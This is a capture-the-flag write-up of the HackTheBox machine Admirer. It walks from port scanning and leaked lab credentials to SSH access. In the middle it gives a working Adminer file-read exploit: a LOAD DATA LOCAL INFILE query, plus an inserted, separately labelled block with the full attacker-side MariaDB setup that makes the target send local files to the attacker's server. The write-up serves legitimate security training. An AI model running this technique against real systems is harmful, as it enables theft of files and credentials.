HTB Admirer Writeup
Introduction
This is my first writeup for a HackTheBox machine. In it I explain my thoughts and ideas while examining and attacking the box. For most steps I do not list the exact commands I used, but I explain how and why I performed them.
Nmap
To start, we will run a port scan on the box using Nmap. The result of this port scan is:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
| 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/admin-dir
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Admirer
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
On this box, three ports are open: 21 (FTP), 22 (SSH) and 80 (HTTP). The first thing to check is whether any of these services can be used without credentials. Anonymous FTP login is disabled, and SSH needs a valid username and password that we do not have yet, so we continued with the HTTP server. Nmap also shows that port 80 serves a ‘robots.txt’ file that disallows the folder ‘/admin-dir’. This is examined in the next section.
Webserver
Going to ‘http://10.10.10.187’ reveals a website showing a gallery of art pictures. Inspecting the page source (F12) shows a contact form that does not work. The Admirer link at the bottom left of the page points to ‘index.html’, but clicking it shows that ‘index.html’ does not exist. Changing the URL to ‘index.php’ returns the same homepage as before, so we now know the webserver is serving PHP files.
During the port scan we found that the webserver has a ‘robots.txt’ file which disallows the folder ‘/admin-dir’. First we examined the ‘robots.txt’ file itself and found this comment:
User-agent: *
# This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
Disallow: /admin-dir
This comment suggests that ‘waldo’ is a potential username. It also states that the folder contains personal contacts and credentials, which makes it worth a closer look.
Next we tried to open the ‘/admin-dir’ folder, but access to the directory itself is denied (403 Forbidden). Since the comment says the folder contains contacts and credentials, we guessed file names manually and found that the contacts are stored in ‘admin-dir/contacts.txt’ and the credentials in ‘admin-dir/credentials.txt’. A more systematic way to find such files is fuzzing, for example with gobuster against ‘/admin-dir’ using a wordlist and the ‘txt’ extension. The ‘contacts.txt’ file contains:
##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb
##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb
# Amy
Email: a.bialik@admirer.htb
# Leonard
Email: l.galecki@admirer.htb
#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb
# Bernadette
Email: b.rauch@admirer.htb
And the ‘credentials.txt’ file contains:
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P
[FTP account]
ftpuser
%n?4Wz}R$tTF7
[Wordpress account]
admin
w0rdpr3ss01!
These are all potential username and password combinations to try. Among them is an FTP account, and logging in to the FTP server on the box with these credentials succeeded.
FTP
The FTP server contains two files: ‘dump.sql’ and ‘html.tar.gz’. The ‘dump.sql’ file contains the structure of the table ‘items’ and reveals that the database is named ‘admirerdb’ and that the server is MariaDB.
The ‘html.tar.gz’ file contains a backup of the website. Two folders in it are interesting: ‘utility-scripts’ and ‘w4ld0s_s3cr3t_d1r’. The ‘utility-scripts’ folder contains four PHP files:
- admin_tasks.php: runs the ‘/opt/script/admin_tasks.sh’ script on the server to perform a few administrative commands
- db_admin.php: contains new database credentials: waldo:Wh3r3_1s_w4ld0?
- info.php: calls phpinfo()
- phptest.php: runs a simple echo to test that PHP is working correctly
The ‘w4ld0s_s3cr3t_d1r’ folder contains two files: ‘credentials.txt’ and ‘contacts.txt’. The ‘contacts.txt’ file is identical to the one on the live webserver. The ‘credentials.txt’ file, however, contains one more credential than the one on the webserver:
[Bank Account]
waldo.11
Ezy]m27}OREc$
We tried these new credentials against every service found so far, but without luck, and continued examining the webserver.
Webserver
The FTP backup revealed a ‘utility-scripts’ folder. On the live webserver all four files exist except ‘db_admin.php’. To see what else is in this folder we ran gobuster with the ‘dirb/big.txt’ wordlist and the ‘php’ extension, which found an ‘adminer.php’ file. Opening it shows Adminer, a single-file database management tool similar to phpMyAdmin. The first thing to notice is the upgrade notice in the top left corner of the page: 4.6.2 –> 4.7.7, so this is an old version. Searching for known issues in Adminer 4.6.2 shows that this version lets anyone with access to the login page connect the Adminer instance to an arbitrary MySQL/MariaDB server, and that a server under the attacker's control can then use the MySQL ‘LOAD DATA LOCAL INFILE’ feature to make the client (the PHP process on the target) read a local file and send its contents to the server. In other words, the vulnerability lets us read files from the machine hosting Adminer, with the permissions of the web server user.
To abuse this, we set up our own MariaDB server with a user that is allowed to connect from any host and has full privileges on a database containing a single-column table to hold the file contents. We then logged in through Adminer with that user and our server's address, and ran this SQL query, which makes the target read the file and store its lines in the table:
LOAD DATA LOCAL INFILE '/var/www/html/index.php'
INTO TABLE admirer.test
FIELDS TERMINATED BY "\n";
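The complete attacker-side setup and read-back, as an added example that is not part of the original writeup. The database name ‘admirer’, table ‘test’, user ‘attacker’ and the password are assumptions; the target file path is the one the writeup ends up reading.

```sql
-- Attacker side: a MariaDB server reachable from the target (added example, not the
-- writeup's own setup). 'admirer', 'test', 'attacker' and the password are assumptions.
-- The server must accept LOAD DATA LOCAL (server variable local_infile=ON, the MariaDB
-- default) and must listen on an interface the target can reach (bind-address).
CREATE DATABASE IF NOT EXISTS admirer;
CREATE TABLE IF NOT EXISTS admirer.test (line TEXT);

-- The connection comes from the target, so the user must be allowed from any host ('%').
CREATE USER 'attacker'@'%' IDENTIFIED BY 'choose-a-strong-password';
GRANT ALL PRIVILEGES ON admirer.* TO 'attacker'@'%';
FLUSH PRIVILEGES;

-- Target side: run from Adminer's "SQL command" page after logging in with
-- server = <attacker IP>, username = attacker, database = admirer.
-- The path is opened by the PHP process on the target, not on our server, so it is
-- read with the web server user's permissions. Each line of the file becomes one row.
LOAD DATA LOCAL INFILE '/var/www/html/index.php'
INTO TABLE admirer.test
FIELDS TERMINATED BY "\n";

-- Read the captured file back, from Adminer or from a local client on our server.
SELECT line FROM admirer.test;

-- Empty the table before fetching the next file so the contents do not mix.
TRUNCATE TABLE admirer.test;
```

Because the file is opened by the target's own MySQL client, a non-existent or unreadable path produces an error on the Adminer page rather than an empty table, which is a quick way to tell "not there" from "not permitted".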
Trying to read files that the web server user cannot access (anything outside ‘/var/www/html/’ that is not readable by that user) returns a permission error, so we need to find which readable file gets us further towards user access. We tried all the files in the ‘utility-scripts’ and ‘admin-dir’ folders, but they are the same as in the backup. Then we realised we had not yet examined ‘index.php’ itself. Retrieving the content of ‘index.php’ revealed a new credential:
$servername = "localhost";
$username = "waldo";
$password = "&<h5b~yK3F#{PaPB&dA}{H>";
$dbname = "admirerdb";
The database password is reused for waldo's system account: logging in over SSH as ‘waldo’ with it succeeds, and we retrieved the user flag.
Conclusion
Admirer is rated as an ‘easy’ box, and the techniques used are indeed easy. However, the amount of guessing and puzzling in this box is quite a struggle. I really enjoyed setting up my own SQL server to abuse the vulnerability in the Adminer service. The next writeup of a HackTheBox machine will be released in a couple of days.